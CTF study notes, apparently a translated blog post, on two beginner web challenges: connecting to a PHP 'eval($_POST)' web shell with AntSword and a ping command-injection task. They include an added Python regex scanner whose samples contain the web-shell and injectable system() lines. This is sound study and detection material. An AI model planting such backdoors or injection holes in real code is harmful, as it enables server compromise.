CTF Study Notes - Knife&Exec

1. [Geek Challenge 2019] Knife

1. Topic


2. Problem solving steps

At first glance at the code in the challenge, the hint is the "kitchen knife" (China Chopper), so I used AntSword to connect to it.
The connection is successful.
Return to the home directory and find the flag file.
Find the FLAG.

3. Summary
  1. Learned how to use AntSword and China Chopper, connecting with the password.
  2. eval($_POST["Syc"]); is a PHP one-line web shell (a "one-sentence Trojan"): the eval() function executes the string passed to it as PHP code, and $_POST supplies that string from the data submitted in the POST request. It can therefore be left as a backdoor for China Chopper to connect to.
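
To find a backdoor like the one above during a code audit, here is an added example (not part of the original notes) that flags PHP statements where a code- or command-execution function is fed directly from request data. The file names and sample sources are constructed, and the regex is a heuristic rather than a PHP parser.

```python
import re

# Request-controlled PHP superglobals (case-sensitive in PHP).
SOURCES = r"\$_(?:POST|GET|REQUEST|COOKIE)\b"
# Functions that run a string as PHP code or as an OS command (case-insensitive in PHP).
SINKS = r"(?i:eval|assert|system|exec|shell_exec|passthru|popen|proc_open)"
# A bare sink call (not a method or a longer identifier) whose arguments
# mention a request superglobal before the statement's closing ';'.
PATTERN = re.compile(r"(?<![\w$>:])" + SINKS + r"\s*\(([^;]*?" + SOURCES + r"[^;]*)\)\s*;")
# Heuristic comment matcher; it does not understand '//' or '#' inside string literals.
COMMENTS = re.compile(r"/\*.*?\*/|(?://|#)[^\n]*", re.S)

# Constructed sample sources, embedded so the example runs offline.
SAMPLES = {
    "shell.php": '<?php eval($_POST["Syc"]);?>',
    "spaced.php": "<?php\n// upload helper\nEVAL (\n  $_REQUEST['c']\n) ;\n",
    "ping.php": '<?php system("ping -c 3 " . $_POST["target"]);',
    "clean.php": '<?php\n// eval($_POST["x"]); removed\n$r = $pdo->exec($sql);\n'
                 'echo htmlspecialchars($_GET["q"]);\n',
}


def find_webshell_sinks(php_source):
    """Return (line_number, matched_text) for each sink fed by request data."""
    # Blank out comments but keep newlines so reported line numbers stay correct.
    cleaned = COMMENTS.sub(lambda m: re.sub(r"[^\n]", " ", m.group()), php_source)
    hits = []
    for m in PATTERN.finditer(cleaned):
        line = cleaned.count("\n", 0, m.start()) + 1
        hits.append((line, " ".join(m.group().split())))
    return hits


def scan(files):
    """Map each file name to its findings, omitting files with none."""
    report = {}
    for name, source in files.items():
        hits = find_webshell_sinks(source)
        if hits:
            report[name] = hits
    return report


if __name__ == "__main__":
    for name, hits in scan(SAMPLES).items():
        for line, text in hits:
            print(f"{name}:{line}: {text}")
```

A hit is a lead for manual review, not proof of compromise; obfuscated shells that build the function name at runtime will not match this pattern.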

2. [ACTF2020 Freshman Competition] Exec

1. Topic
2. Problem solving steps

When I did it myself, I had no clue. I didn't expect it to be so simple: just access the file directly...

3. Summary
  1. My guess is that the input is passed directly to ping without any filtering, so the command in the input is executed.

Origin blog.csdn.net/Obs_cure/article/details/108833402